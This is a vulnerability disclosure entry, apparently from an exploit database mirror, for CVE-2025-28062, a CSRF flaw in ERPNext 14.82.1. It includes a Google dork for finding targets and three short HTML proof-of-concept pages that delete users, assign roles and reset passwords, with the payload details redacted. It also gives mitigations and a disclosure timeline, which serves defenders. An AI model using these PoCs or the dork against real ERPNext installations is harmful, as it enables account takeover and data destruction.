Vulners
Lucene search
๐ ERPNext 14.82.1 Cross Site Request Forgery
๐๏ธย 06 May 2025ย 00:00:00Reported byย Ahmed ThaibanTypeย 
ย packetstorm๐ย packetstorm.news๐ย 93ย Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2025-28062 | 5 May 202520:03 | โ | circl |
 | ERPNext ่ทจ็ซ่ฏทๆฑไผช้ ๆผๆด | 5 May 202500:00 | โ | cnnvd |
 | ERPNext Cross-Site Request Forgery Vulnerability | 14 May 202500:00 | โ | cnvd |
 | CVE-2025-28062 | 5 May 202500:00 | โ | cve |
 | CVE-2025-28062 | 5 May 202500:00 | โ | cvelist |
 | ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF) | 6 May 202500:00 | โ | exploitdb |
 | EUVD-2025-13459 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2025-28062 | 5 May 202516:15 | โ | nvd |
 | CVE-2025-28062 | 5 May 202516:15 | โ | osv |
 | PT-2025-19726 ยท Erpnext ยท Erpnext | 5 May 202500:00 | โ | ptsecurity |
10
# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps
# Description:
A Cross-Site Request Forgery (CSRF) vulnerability Lead to Account Takeover exists in ERPNext 14.82.1 and 14.74.3. This flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.
Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs
Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change
The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
---
# PoC 1: Delete a User
<html>
<body>
<h2>Delete User</h2>
<a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
Click Here
</a>
</body>
</html>
---
# PoC 2: Assign Role
<html>
<body>
<h2>Assign Role to User</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Add Role
</a>
</body>
</html>
---
# PoC 3: Reset Password
<html>
<body>
<h2>Reset User Password</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Reset Password
</a>
</body>
</html>
---
# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes
---
# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory
---
# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne
# References:
- https://owasp.org/www-community/attacks/csrfData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.18.1
EPSS0.00224
SSVC